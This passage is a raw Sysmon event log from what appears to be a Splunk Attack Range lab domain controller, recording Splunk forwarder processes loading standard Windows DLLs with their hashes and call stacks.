(rs1_release.220301-1704)Host for SCM/SDDL/LSA Lookup APIsMicrosoft® Windows® Operating SystemMicrosoft Corporationsechost.dllMD5=9F0F4C38A22FC9FFB8814F77A9563680,SHA256=E9ABDA1063716301F5D06DBC94D6A35B3F53A14B946525E5F764485132DB6166,IMPHASH=D6E06125849E8565A50F366A0149FB40trueMicrosoft WindowsValid 23542300x800000000000000099296Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:47.459{326FD73D-A45C-6294-5601-000000005502}6368NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=068B4F48A3C1A637D5DD70AD8E624CEC,SHA256=EF90AEC9E5AAC7D5EC3E28A1787C7653B949EF1F1FA79DCAAC51C07DA26CAEB8,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 734700x800000000000000099295Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:47.459{326FD73D-C0EF-6294-3A0B-000000005502}4768C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\ws2_32.dll10.0.14393.3241 (rs1_release_inmarket.190910-1801)Windows Socket 2.0 32-Bit DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationws2_32.dllMD5=06E82905620845A7C185BDEE85CC4140,SHA256=B75C9B080293F85568912BABE749F403144959206F9C6BAB36B628E8F77C5DA0,IMPHASH=76A5AA3DF6083D853F576403C8F841A8trueMicrosoft WindowsValid 10341000x800000000000000099294Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:47.459{326FD73D-A44C-6294-0901-000000005502}53725392C:\Windows\system32\conhost.exe{326FD73D-C0EF-6294-3A0B-000000005502}4768C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 734700x800000000000000099293Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:47.459{326FD73D-C0EF-6294-3A0B-000000005502}4768C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\KernelBase.dll10.0.14393.5125 (rs1_release.220429-1732)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationKernelbase.dllMD5=D8F18C830B03B0D60C10093ECB020E60,SHA256=CF0D33CEC46BB41C6F5693A84491ACD7F7CBECB429BA6C47AB5A170D4DF3484F,IMPHASH=05349EBAA635D77714868763D44881E9trueMicrosoft WindowsValid 734700x800000000000000099292Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:47.459{326FD73D-C0EF-6294-3A0B-000000005502}4768C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\kernel32.dll10.0.14393.5066 (rs1_release.220401-1841)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel32MD5=E258A076D1B87D41F724E431B3293BA5,SHA256=0670462AC0932F314B2E4A0A20B4B6F96C024C2310BD2AF21B20BF7A8EC9FF8E,IMPHASH=3CE0779E0F4E275CD51A359A98CCC682trueMicrosoft WindowsValid 734700x800000000000000099291Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:47.459{326FD73D-C0EF-6294-3A0B-000000005502}4768C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\ntdll.dll10.0.14393.5006 (rs1_release.220301-1704)NT Layer DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationntdll.dllMD5=F5EE39B17A8BCDEDC3D40997C26F62B1,SHA256=11C1C88B1CC11D9800DEEF27ED7ABDFDE3DC852687A3B9FBD5153284106E5952,IMPHASH=00000000000000000000000000000000trueMicrosoft WindowsValid 734700x800000000000000099290Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:47.459{326FD73D-C0EF-6294-3A0B-000000005502}4768C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.2.5Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exeMD5=92BD3C71158FA8B9A0821D43564A56E7,SHA256=7850C91F8D08679D7A0579D350C08CA6F6EDEA8A12226ADC2E30B4ABF8CE0BE2,IMPHASH=FD2D4472615B421BAEF1D51F46EF5F52trueSplunk, Inc.Valid 10341000x800000000000000099289Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:47.459{326FD73D-A254-6294-0C00-000000005502}8482056C:\Windows\system32\svchost.exe{326FD73D-A262-6294-2700-000000005502}2872C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000099288Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:47.459{326FD73D-A254-6294-0C00-000000005502}8482056C:\Windows\system32\svchost.exe{326FD73D-A262-6294-2700-000000005502}2872C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000099287Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:47.459{326FD73D-A254-6294-0C00-000000005502}8482056C:\Windows\system32\svchost.exe{326FD73D-A262-6294-2700-000000005502}2872C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000099286Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:47.459{326FD73D-A254-6294-0C00-000000005502}8482056C:\Windows\system32\svchost.exe{326FD73D-A262-6294-2700-000000005502}2872C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000099285Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:47.459{326FD73D-A252-6294-0500-000000005502}4161908C:\Windows\system32\csrss.exe{326FD73D-C0EF-6294-3A0B-000000005502}4768C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000099284Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:47.459{326FD73D-A44C-6294-0501-000000005502}51646008C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{326FD73D-C0EF-6294-3A0B-000000005502}4768C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e499f1|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b3255|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd30d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b59b6|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd3c14|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd79a|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1c0f1c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd07d2|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd491d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bb965|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dc694e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000099283Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:47.460{326FD73D-C0EF-6294-3A0B-000000005502}4768C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.2.5Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{326FD73D-A253-6294-E703-000000000000}0x3e70SystemMD5=92BD3C71158FA8B9A0821D43564A56E7,SHA256=7850C91F8D08679D7A0579D350C08CA6F6EDEA8A12226ADC2E30B4ABF8CE0BE2,IMPHASH=FD2D4472615B421BAEF1D51F46EF5F52{326FD73D-A44C-6294-0501-000000005502}5164C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000099282Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:47.100{326FD73D-C0EE-6294-390B-000000005502}12764524C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{326FD73D-A44C-6294-0501-000000005502}5164C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6ae795|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6ae2c6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+643d8|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+65dfc|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+9dcf50|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 734700x800000000000000099281Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:47.100{326FD73D-C0EE-6294-390B-000000005502}1276C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Windows\System32\dbgcore.dll10.0.14321.1024 (debuggers(dbg).210127-1811)Windows Core Debugging HelpersMicrosoft® Windows® Operating SystemMicrosoftDBGCORE.DLLMD5=72E8FEC8419AB470FB737883463688FE,SHA256=1DA7D2D2D1C4E6EC17101A4997C4AA610818730D63C72C1D2084ABA3F25C5146,IMPHASH=F67CBD9561C1FEF51B817BA184E81D2EtrueMicrosoft WindowsValid 734700x800000000000000099280Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:47.100{326FD73D-C0EE-6294-390B-000000005502}1276C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Windows\System32\dbghelp.dll10.0.14321.1024 (rs1_release.160715-1616)Windows Image HelperMicrosoft® Windows® Operating SystemMicrosoftDBGHELP.DLLMD5=2C92DF5D32661FB4B81B08B72B2102A7,SHA256=BCEF4DEBDE7D8D6916EE3D3E5E63A725E03A058AABCD7DD49DF9D48B16E96D1A,IMPHASH=E7FD2920222985E31019D022BB39EFBEtrueMicrosoft WindowsValid 23542300x800000000000000099340Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:48.303{326FD73D-A45C-6294-5601-000000005502}6368NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3547493197D84A4C9220E342E0EF587E,SHA256=2C12E61913A7D8B9FE44751C27F0BAF3DD1CAC99AF4D0150042461342744360A,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000099339Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:48.193{326FD73D-A44C-6294-0501-000000005502}5164NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\spool\splunk\tracker.logMD5=EEF4A506B9FF9F68F1A0D841561505A0,SHA256=317F31DE483EFF77DE579DA57EECA8B0459DD5D6324E5DAA9083078FB82B11F5,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 734700x800000000000000099443Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:49.709{326FD73D-C0F1-6294-3C0B-000000005502}1388C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\kernel.appcore.dll10.0.14393.2312 (rs1_release.180607-1919)AppModel API HostMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel.appcore.dllMD5=0AF5EF8A7FEFD4B37036B71514FC20CF,SHA256=D4F178583F6F33794D42B4DB11008494E9CD9F069C2AD2CA304DA63F9B5F659C,IMPHASH=94524C03C5380F78283785F1E05E667DtrueMicrosoft WindowsValid 10341000x800000000000000099442Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:49.709{326FD73D-C0F1-6294-3C0B-000000005502}13882596C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{326FD73D-A44C-6294-0501-000000005502}5164C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+606005|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+605b36|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+75996|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+9dd220|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 734700x800000000000000099441Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:49.693{326FD73D-C0F1-6294-3C0B-000000005502}1388C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\dbgcore.dll10.0.14321.1024 (debuggers(dbg).210127-1811)Windows Core Debugging HelpersMicrosoft® Windows® Operating SystemMicrosoftDBGCORE.DLLMD5=72E8FEC8419AB470FB737883463688FE,SHA256=1DA7D2D2D1C4E6EC17101A4997C4AA610818730D63C72C1D2084ABA3F25C5146,IMPHASH=F67CBD9561C1FEF51B817BA184E81D2EtrueMicrosoft WindowsValid 734700x800000000000000099440Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:49.693{326FD73D-C0F1-6294-3C0B-000000005502}1388C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\dbghelp.dll10.0.14321.1024 (rs1_release.160715-1616)Windows Image HelperMicrosoft® Windows® Operating SystemMicrosoftDBGHELP.DLLMD5=2C92DF5D32661FB4B81B08B72B2102A7,SHA256=BCEF4DEBDE7D8D6916EE3D3E5E63A725E03A058AABCD7DD49DF9D48B16E96D1A,IMPHASH=E7FD2920222985E31019D022BB39EFBEtrueMicrosoft WindowsValid 734700x800000000000000099439Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:49.553{326FD73D-C0F1-6294-3C0B-000000005502}1388C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\cryptbase.dll10.0.14393.0 (rs1_release.160715-1616)Base cryptographic API DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationcryptbase.dllMD5=51FCB0FDEFCB9A3E4A1DC8C8673BC63C,SHA256=63A0E1A76B7ABCF56E44B548568649FFB6B5609402746D48A4DC77CCED20F5FE,IMPHASH=9E9C9DFD04CDDF2B6F1412BF096AEAF4trueMicrosoft WindowsValid 734700x800000000000000099438Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:49.553{326FD73D-C0F1-6294-3C0B-000000005502}1388C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\rsaenh.dll10.0.14393.4467 (rs1_release.210604-1844)Microsoft Enhanced Cryptographic ProviderMicrosoft® Windows® Operating SystemMicrosoft Corporationrsaenh.dllMD5=28140830C342F475A597B2D54C42DFFA,SHA256=99E23D0177C6DC59AD72DEEC46CFB995828EF567F001261BC65532B6DDEAD862,IMPHASH=C918D75BDB7774C087BB6C0C9C0A7686trueMicrosoft WindowsValid 734700x800000000000000099437Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:49.553{326FD73D-C0F1-6294-3C0B-000000005502}1388C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\cryptsp.dll10.0.14393.2969 (rs1_release.190503-1820)Cryptographic Service Provider APIMicrosoft® Windows® Operating SystemMicrosoft Corporationcryptsp.dllMD5=9500AE4C4B639FEAEED0CC6C39F45149,SHA256=C1055D4B9A854282336A5404CA0FCB1A2EBC3417600035338C9CDFC7B8D0778C,IMPHASH=96CBD1B5C0EA88B677BA3BB5FD009869trueMicrosoft WindowsValid 734700x800000000000000099436Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:49.553{326FD73D-C0F1-6294-3C0B-000000005502}1388C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\srvcli.dll10.0.14393.5066 (rs1_release.220401-1841)Server Service Client DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationSRVCLI.DLLMD5=75E3DE473374E0BCBBD1EC60036A93EC,SHA256=23EBE577D2080D4C7532184B69E44BF640BB44084F9046A5AF364268A7BDB1EC,IMPHASH=6CC8301D560C9DC6CB13A6320F3A3B1FtrueMicrosoft WindowsValid 734700x800000000000000099435Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:49.553{326FD73D-C0F1-6294-3C0B-000000005502}1388C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\bcrypt.dll10.0.14393.4583 (rs1_release.210730-1850)Windows Cryptographic Primitives LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationbcrypt.dllMD5=63231EA984BC614584102A96D4F35CB4,SHA256=13C5BD283C01B0D50D8D0D99E88FC67F9234FA14A6860AB2B6EE552199FF6A74,IMPHASH=7C2E79D83754439DC7DE7882DCB4238DtrueMicrosoft WindowsValid 734700x800000000000000099434Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:49.553{326FD73D-C0F1-6294-3C0B-000000005502}1388C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\wkscli.dll10.0.14393.5066 (rs1_release.220401-1841)Workstation Service Client DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationWKSCLI.DLLMD5=3D375474E2FE9A77D243E35954287188,SHA256=7850F11166D7CACED6F628033524ED86191AE92772000AFA677E59A664396E8C,IMPHASH=6990BA83B94C81786A84E6C44E699D03trueMicrosoft WindowsValid 734700x800000000000000099433Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:49.553{326FD73D-C0F1-6294-3C0B-000000005502}1388C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\netutils.dll10.0.14393.0 (rs1_release.160715-1616)Net Win32 API Helpers DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationNETUTILS.DLLMD5=504739A17F3A05531258784275A6F375,SHA256=A931C54C47B454407990241DB12BD209AC219C55F026ADDED427A9E84A409923,IMPHASH=7D1B32891B9173ED71ED6C18DEFEE578trueMicrosoft WindowsValid 734700x800000000000000099432Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:49.553{326FD73D-C0F1-6294-3C0B-000000005502}1388C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\netapi32.dll10.0.14393.5125 (rs1_release.220429-1732)Net Win32 API DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationNetApi32.DLLMD5=E8FF656B90334BED915B2BC6BBE57C9A,SHA256=8BB399AD98B9D9C637D09EB48306B1E80C50BAA7D1C9811595D9042E4294173C,IMPHASH=FE007B4B6CED5075C98434207FFF87E0trueMicrosoft WindowsValid 734700x800000000000000099431Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:49.537{326FD73D-C0F1-6294-3C0B-000000005502}1388C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Program Files\SplunkUniversalForwarder\bin\msvcp140.dll14.16.27012.6 built by: vcwrkspcMicrosoft® C Runtime LibraryMicrosoft® Visual Studio® 2017Microsoft Corporationmsvcp140.dllMD5=BA72C2F6F465926980ADC2FB7F8B3490,SHA256=86881A7054532019291C162F0A8177980C1C2B45490F7E88543F22915D08D9FF,IMPHASH=ADF99B9EA3A1F76C33522F96772BC4DDtrueMicrosoft CorporationValid 734700x800000000000000099430Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:49.537{326FD73D-C0F1-6294-3C0B-000000005502}1388C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\msvcp_win.dll10.0.14393.2999 (rs1_release_inmarket.190520-1518)Microsoft® C Runtime LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationmsvcp_win.dllMD5=C50C0CEFA633773AB29572E05834F1FE,SHA256=50178F23AA57B31626614C6C65DA2B6518A64FF684FFA18A0F49C4431DFCBEC5,IMPHASH=5B59892514923CABE9B70CFE22A3F59AtrueMicrosoft WindowsValid 734700x800000000000000099429Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:49.537{326FD73D-C0F1-6294-3C0B-000000005502}1388C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\oleaut32.dll10.0.14393.4402 (rs1_release.210426-1725)OLEAUT32.DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationOLEAUT32.DLLMD5=57B07BF89C63FA60A810FEDE496126CA,SHA256=080632F80FA2A387E5A55C670FFE07C927D553FDDA26F7F8B4156C0C6B20E75E,IMPHASH=8987D71C85BB2C13D3D90194331F962FtrueMicrosoft WindowsValid 734700x800000000000000099428Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:49.537{326FD73D-C0F1-6294-3C0B-000000005502}1388C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\bcryptprimitives.dll10.0.14393.4770 (rs1_release.211101-1440)Windows Cryptographic Primitives LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationbcryptprimitives.dllMD5=54417B63FB3760BC6DBC5DB1BDA4C272,SHA256=B7A8B457B252AB949C067D5FCFEFB2AE98E9115B958D2A0FC120D7B13B3E9FAD,IMPHASH=BA5C37A1CF8C2730ED1F4DA1587496A5trueMicrosoft WindowsValid 734700x800000000000000099427Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:49.537{326FD73D-C0F1-6294-3C0B-000000005502}1388C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\combase.dll10.0.14393.5125 (rs1_release.220429-1732)Microsoft COM for WindowsMicrosoft® Windows® Operating SystemMicrosoft CorporationCOMBASE.DLLMD5=D63E9AB9C67A611B947527D96B81B44D,SHA256=0F050418ED9A8C0F879636B1B25AF9C651966FE75B8EFAD76F2AD73BB0AD54BC,IMPHASH=0863DD72CA0C3702DB7ACD19A4D5DEB1trueMicrosoft WindowsValid 734700x800000000000000099426Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:49.537{326FD73D-C0F1-6294-3C0B-000000005502}1388C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\Wldap32.dll10.0.14393.5125 (rs1_release.220429-1732)Win32 LDAP API DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationWLDAP32.DLLMD5=5760D3C7E030C7F1984753F6050BF4DA,SHA256=DCB422305A2B3160F8FD53B3F3841B1EE80E4D81D2599FA02CEA9BBC5E5E2834,IMPHASH=D13722FCCB1CDD38974ADB7277D98799trueMicrosoft WindowsValid 734700x800000000000000099425Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:49.537{326FD73D-C0F1-6294-3C0B-000000005502}1388C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\ole32.dll10.0.14393.4651 (rs1_release.210911-1554)Microsoft OLE for WindowsMicrosoft® Windows® Operating SystemMicrosoft CorporationOLE32.DLLMD5=3858DC319832992A738C12330E3E579C,SHA256=DEDE14211FCAE7CB5500730B35BABFEAC1F0D207A248D8B6418D2EEF8F348716,IMPHASH=9724475F92787AFC45A3BA458C0DCDC5trueMicrosoft WindowsValid 734700x800000000000000099424Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:49.537{326FD73D-C0F1-6294-3C0B-000000005502}1388C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\gdi32full.dll10.0.14393.5125 (rs1_release.220429-1732)GDI Client DLLMicrosoft® Windows® Operating SystemMicrosoft 